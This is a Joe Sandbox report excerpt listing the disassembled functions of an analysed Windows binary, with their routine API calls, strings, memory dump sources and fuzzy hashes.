Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$ExceptionThrow
String ID: -r0$Unsupported rename command:
API String ID: 2366012087-1002762148
Opcode ID: be6f0e23d11da639e35fb8e1b787fa6c1a8b609b37410f07508a709fd700544c
Instruction ID: 6916049ad02950bd6a056cfc45953de6b0905d5cb174c4ab6e17f01f4e04f4a0
Opcode Fuzzy Hash: be6f0e23d11da639e35fb8e1b787fa6c1a8b609b37410f07508a709fd700544c
Instruction Fuzzy Hash: B711D639940205AACB01FF95D853AFEB778EFE4301F40841AF60123292DB745E0AD791

Uniqueness

Uniqueness Score: -1.00%

Function 009D90B8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll), ref: 009D90C6
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 009D90D6

Strings

RtlGetVersion, xrefs: 009D90D0
ntdll.dll, xrefs: 009D90C1

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 1646373207-1489217083
Opcode ID: 192ea82a1bd2a9233e9d625e169bbf73c89903eb112ffd51c4caf462b89a7e5a
Instruction ID: c1b18268975c833ba03b6890fd938076fc0045baa29cbaa25523aa3ca9e01170
Opcode Fuzzy Hash: 192ea82a1bd2a9233e9d625e169bbf73c89903eb112ffd51c4caf462b89a7e5a
Instruction Fuzzy Hash: F8F09634ED421A5ECF34BB709C0F6E732ACAB5A70CF0049A5D605D1284D7B4C984CD91

Uniqueness

Uniqueness Score: -1.00%

Function 00A0A393 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(?,00A56090), ref: 00A0A3DE

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

fputs.MSVCRT ref: 00A0A3BD
fputs.MSVCRT ref: 00A0A3C2

Strings

ERROR: , xrefs: 00A0A3B8

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$ExceptionThrowfputc
String ID: ERROR:
API String ID: 2339886702-977468659
Opcode ID: 9fe88d5a01dfb96d7a4204ccf9bc0fd56fc163cd357f83d7583c6d9cef857e1d
Instruction ID: 437ca3d901852162d7d2a96c4e803ca7dfbcefecc8233c88083457115b0980b3
Opcode Fuzzy Hash: 9fe88d5a01dfb96d7a4204ccf9bc0fd56fc163cd357f83d7583c6d9cef857e1d
Instruction Fuzzy Hash: 90F0A07AA00218BBCB01ABDCDD11C9FB7ADEF88710711451AF900A3351C6726E015BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00A0603E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00A0606F
fputs.MSVCRT ref: 00A06077

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

Strings

:, xrefs: 00A0604E
, xrefs: 00A06055

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$fputc
String ID: $:
API String ID: 1185151155-4041779174
Opcode ID: bf97361580426df9eca6ee8e1608287b1761030116507a007f406a821aa91709
Instruction ID: 7e22eaebd14f70a026731ea21618e1043e328f5e866b166acb3bd081da155b96
Opcode Fuzzy Hash: bf97361580426df9eca6ee8e1608287b1761030116507a007f406a821aa91709
Instruction Fuzzy Hash: 15F0A036900258ABCF22AFA8DC05EDFBF79EF99314F04440AEC9523291C735A524CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 009DA088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,?,009D9F84,00000001), ref: 009DA090
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 009DA0A0

Strings

RtlGetVersion, xrefs: 009DA09A
ntdll.dll, xrefs: 009DA08B

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 1646373207-1489217083
Opcode ID: db5e0a5dd6cc1309437d4aeec66a501df430bf6646cc152326135bfeded10a26
Instruction ID: c88a91ee190b39cbbc90ec733a075be07e5d0f9df9838efc87f023bfdf24551b
Opcode Fuzzy Hash: db5e0a5dd6cc1309437d4aeec66a501df430bf6646cc152326135bfeded10a26
Instruction Fuzzy Hash: E2D0A73939422139A66096F8BC0FAD7224CABC6B117114812B500D1080DBC08D624063

Uniqueness

Uniqueness Score: -1.00%

Function 00A2B320 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetLargePageMinimum,009E0A2C), ref: 00A2B32A
GetProcAddress.KERNEL32(00000000), ref: 00A2B331

Strings

kernel32.dll, xrefs: 00A2B325
GetLargePageMinimum, xrefs: 00A2B320

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetLargePageMinimum$kernel32.dll
API String ID: 1646373207-2515562745
Opcode ID: 07a6565d151d7cb37f8507da47d16ed53b73cf6435c396220d92c0cee5120782
Instruction ID: 2a9a169860e59e2e3fb5d0b15d1b05c0f300015f1591b1374a2193bc373084d7
Opcode Fuzzy Hash: 07a6565d151d7cb37f8507da47d16ed53b73cf6435c396220d92c0cee5120782
Instruction Fuzzy Hash: 89D0C778751323FB9B10DFF96C2E75B376479957023011534A811C5490DF21C901CA31

Uniqueness

Uniqueness Score: -1.00%

Function 009FC983 Relevance: 6.3, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 009FC999
memcmp.MSVCRT ref: 009FC9B4
memcmp.MSVCRT ref: 009FC9C8

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 0fe3fca76eedc41f2888b895c175533bf7ffec9ad6b1192d7deb680aadc12c67
Instruction ID: 50f3b1c65b96a57145539f4ed3087bf9f62b4e20701faccf048c47565cc1aaa0
Opcode Fuzzy Hash: 0fe3fca76eedc41f2888b895c175533bf7ffec9ad6b1192d7deb680aadc12c67
Instruction Fuzzy Hash: AD1104B175020D7BD7108A14DE02FFA73A85B94750F018829FE86EF282F2A4F9509795

Uniqueness

Uniqueness Score: -1.00%

Function 009F5CBA Relevance: 6.3, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 009F5CD0
memcmp.MSVCRT ref: 009F5CEB
memcmp.MSVCRT ref: 009F5CFF

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 9ccd5e0a840dc239c6af51e60c1b2f47272f4d2e4153d5be7790362bc01cabb4
Instruction ID: f73ed1b435478f61ca421981345bce4b0d4db662989e5f791e34ae0f14466bc1
Opcode Fuzzy Hash: 9ccd5e0a840dc239c6af51e60c1b2f47272f4d2e4153d5be7790362bc01cabb4
Instruction Fuzzy Hash: 7B110171B4030A7BC7108A14CD02FBA73A86B84B40F164829FF86DF292F6A4FA509784

Uniqueness

Uniqueness Score: -1.00%

Function 00A17E18 Relevance: 6.3, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00A17E2E
memcmp.MSVCRT ref: 00A17E49
memcmp.MSVCRT ref: 00A17E5D

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 0f47a7ff4cb1a4f061a4f1fa55b525e3ca3df7f7f0e4df75673ba3ebd40d245d
Instruction ID: fdcfa64b9f90e6b66b72506a7cab6bd708a70c64bb006312c87c20e6142202ee
Opcode Fuzzy Hash: 0f47a7ff4cb1a4f061a4f1fa55b525e3ca3df7f7f0e4df75673ba3ebd40d245d
Instruction Fuzzy Hash: B0119D71B442057BCB108B24CD02FEE73F46B94750F054869FE469B282F6B1FA909694

Uniqueness

Uniqueness Score: -1.00%

Function 009D37E5 Relevance: 6.3, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,000004B0,00000000,00000000,?,?,009D1C23,0000FDE9,7FFFFFE0,00000000,00000000), ref: 009D3811
GetLastError.KERNEL32(?,009D1C23,0000FDE9,7FFFFFE0,00000000,00000000,?,00000000,00000000), ref: 009D381A
_CxxThrowException.MSVCRT(00000000,00A4FFC8), ref: 009D3834
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?,?,009D1C23,0000FDE9,7FFFFFE0,00000000,00000000,?,00000000,00000000), ref: 009D3859
_CxxThrowException.MSVCRT(00000000,00A4FFC8), ref: 009D386F

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ByteCharExceptionMultiThrowWide$ErrorLast
String ID:
API String ID: 2296236218-0
Opcode ID: f04acf8049cd21046987d5780e8f11accc38573c724ccf892827b29783f653f2
Instruction ID: 824675bd318a9d44f2aec0f5e0139bcc8799cb92155539832a7c72a7f89d47b7
Opcode Fuzzy Hash: f04acf8049cd21046987d5780e8f11accc38573c724ccf892827b29783f653f2
Instruction Fuzzy Hash: 0311F9B5640205BF9710DF95CC81A6BBBADEF84740710C12AF909C7250D770AD51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A05C85 Relevance: 6.1, APIs: 4, Instructions: 124stringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A05C8A

Part of subcall function 00A058F5: __EH_prolog.LIBCMT ref: 00A058FA

strlen.MSVCRT ref: 00A05D25

Part of subcall function 009F3294: strlen.MSVCRT ref: 009F32DE

strlen.MSVCRT ref: 00A05D99
fputs.MSVCRT ref: 00A05DE6

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: strlen$H_prolog$fputs
String ID:
API String ID: 3404455912-0
Opcode ID: 1c8a7aa3ca63de67d927aee20d64cff4aba77eae632620383a8d9faaaeb5237a
Instruction ID: da263214a014fc8b370e7a6f12aa89587abec49681d08ee2d7d990cbe89eb1fe
Opcode Fuzzy Hash: 1c8a7aa3ca63de67d927aee20d64cff4aba77eae632620383a8d9faaaeb5237a
Instruction Fuzzy Hash: 73416031E0061A9FCF15EFB8D985BEE7BB5AF88300F004466E905A7291DB349D55DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A0C665 Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A0C66A
EnterCriticalSection.KERNEL32(00A5A8A0,?,00000001,?,?,00A0C9F1,?,0000006F,0000006F,?,?,00000000), ref: 00A0C67E
fputs.MSVCRT ref: 00A0C6CF
LeaveCriticalSection.KERNEL32(00A5A8A0,?,00000001,?,?,00A0C9F1,?,0000006F,0000006F,?,?,00000000), ref: 00A0C7A0

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: CriticalSection$EnterH_prologLeavefputs
String ID:
API String ID: 2174113412-0
Opcode ID: 9b3c2e94e088be46d72a3dc284ecae15d86004d4e01e12aec7f87f5f8fdcaef0
Instruction ID: ec3e93fe92041a0ff18f0e90b2419e54b6d065deeaa9edd4a7cd1fef1f3cd61c
Opcode Fuzzy Hash: 9b3c2e94e088be46d72a3dc284ecae15d86004d4e01e12aec7f87f5f8fdcaef0
Instruction Fuzzy Hash: 3841AD31600789DFCF21AFB4D4907AABBA2BF95310F048A2EF55A57291CB316805DB52

Uniqueness

Uniqueness Score: -1.00%

Function 009EF0CF Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,00000000,?), ref: 009EF122
GetLastError.KERNEL32(?,?,00000000,?), ref: 009EF14B
GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,?,00000000,?), ref: 009EF1A3
GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,?), ref: 009EF1B9

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ErrorFileLastSecurity
String ID:
API String ID: 555121230-0
Opcode ID: febabe95674477c4935b3903653f1da4c6bee02a7d5f0fd642c9a9c137662dd7
Instruction ID: 595774d91fa5889afe080f34836d22d14f990de37324a2ed9284b21d507f2843
Opcode Fuzzy Hash: febabe95674477c4935b3903653f1da4c6bee02a7d5f0fd642c9a9c137662dd7
Instruction Fuzzy Hash: 2D31B034904249EFDB12DFA5C890BEFBBB9FF84300F10886AE46597250D330AE41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009EDCEC Relevance: 6.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 009EDD1B
__aulldiv.LIBCMT ref: 009EDD5C
__aulldiv.LIBCMT ref: 009EDD6B
__aulldiv.LIBCMT ref: 009EDD7A

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: fdef8960fb42e65836490cb94129da42e7bc97a4e2a819a0f015e656302550c4
Instruction ID: 6b501499cc17666d389650a0ba0aa4e1d1c0021bee21c19b1f80ad88d6bb6091
Opcode Fuzzy Hash: fdef8960fb42e65836490cb94129da42e7bc97a4e2a819a0f015e656302550c4
Instruction Fuzzy Hash: 2F116076600244BFDB266AA6DC41EABBBBDEBC4700F00482DB242565A1D672AD509720

Uniqueness

Uniqueness Score: -1.00%

Function 00A034BB Relevance: 6.1, APIs: 4, Instructions: 59timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A034C0
EnterCriticalSection.KERNEL32(00A5A858), ref: 00A034D4
CompareFileTime.KERNEL32(?,?), ref: 00A034FE
LeaveCriticalSection.KERNEL32(00A5A858), ref: 00A03556

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: CriticalSection$CompareEnterFileH_prologLeaveTime
String ID:
API String ID: 3800395459-0
Opcode ID: 55e343dac1ed1a083efa3583de9c295512f89e5a7dc78545a71c47989fba54cd
Instruction ID: e40aada6ee8b33b05076e7ec441e05c02ca9556c135946e861f22a396320a945
Opcode Fuzzy Hash: 55e343dac1ed1a083efa3583de9c295512f89e5a7dc78545a71c47989fba54cd
Instruction Fuzzy Hash: 0C21C032500609EFDF20CF28E845B9ABBF8FF84304F108519E95A836A1D770FA48CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009D5A99 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D5A9E
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 009D5AC0
GetLastError.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 009D5ACA
CreateDirectoryW.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,00000000), ref: 009D5B01

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: CreateDirectory$ErrorH_prologLast
String ID:
API String ID: 1817354178-0
Opcode ID: 397943efb12e63534ef7e8617fabbf5c234007cd708ad6c8f60dd05ef123a85e
Instruction ID: ebeab1ea09b8b0fa82fa762cbfc91a352595fb4e65996f871819862c618340ba
Opcode Fuzzy Hash: 397943efb12e63534ef7e8617fabbf5c234007cd708ad6c8f60dd05ef123a85e
Instruction Fuzzy Hash: 2201D876E40215ABCB15ABA0AC87BBF7B2DDFC1351F158527ED01A2391CF298C4597A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A03420 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A03425
EnterCriticalSection.KERNEL32(00A5A858), ref: 00A03439
LeaveCriticalSection.KERNEL32(00A5A858), ref: 00A03468
LeaveCriticalSection.KERNEL32(00A5A858), ref: 00A034A8

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: CriticalSection$Leave$EnterH_prolog
String ID:
API String ID: 2532973370-0
Opcode ID: a4c183c814a49c3e110603c38be3facc20fca8a886180f4c5ebfd0dbf1b95ccb
Instruction ID: 3bf3c8909a30045d556536c1efca94ec78d1e847edde28f68aeb0bb29a2bb7ec
Opcode Fuzzy Hash: a4c183c814a49c3e110603c38be3facc20fca8a886180f4c5ebfd0dbf1b95ccb
Instruction Fuzzy Hash: 3411917AA00615EFC711CF66E48496FB7B9FF89721B10822DE816CB740C731ED058B50

Uniqueness

Uniqueness Score: -1.00%

Function 00A37E50 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

_beginthreadex.MSVCRT ref: 00A37E65
SetThreadAffinityMask.KERNEL32(00000000,?), ref: 00A37E7D
ResumeThread.KERNEL32(00000000), ref: 00A37E84
GetLastError.KERNEL32 ref: 00A37E96

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: Thread$AffinityErrorLastMaskResume_beginthreadex
String ID:
API String ID: 3268521904-0
Opcode ID: 6efd24f65060f03eb93c0d24c2d1422cc409528c7709eb4c0d0730975d568dd3
Instruction ID: 851cdfbe87162f62b89dac6777b31b782487168f2b4583511a5251927b9c24f4
Opcode Fuzzy Hash: 6efd24f65060f03eb93c0d24c2d1422cc409528c7709eb4c0d0730975d568dd3
Instruction Fuzzy Hash: DEF0E2BB204211ABD3209B58AC44FAF7398EBC2B20F14461AF604CA180D6748C5783B1

Uniqueness

Uniqueness Score: -1.00%

Function 00A0C538 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A0C53D
fputs.MSVCRT ref: 00A0C56C
fputs.MSVCRT ref: 00A0C575
fputs.MSVCRT ref: 00A0C57C

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$H_prologfputcfree
String ID:
API String ID: 3247574066-0
Opcode ID: 56b4daae4314066ff555a6518986b997cb889f59bcd70f282f18f30d40c92ef8
Instruction ID: 7133f0f81a53834492fa0fdcd4de08c2e7b70e50ce7d0cfcd46353ea181415e9
Opcode Fuzzy Hash: 56b4daae4314066ff555a6518986b997cb889f59bcd70f282f18f30d40c92ef8
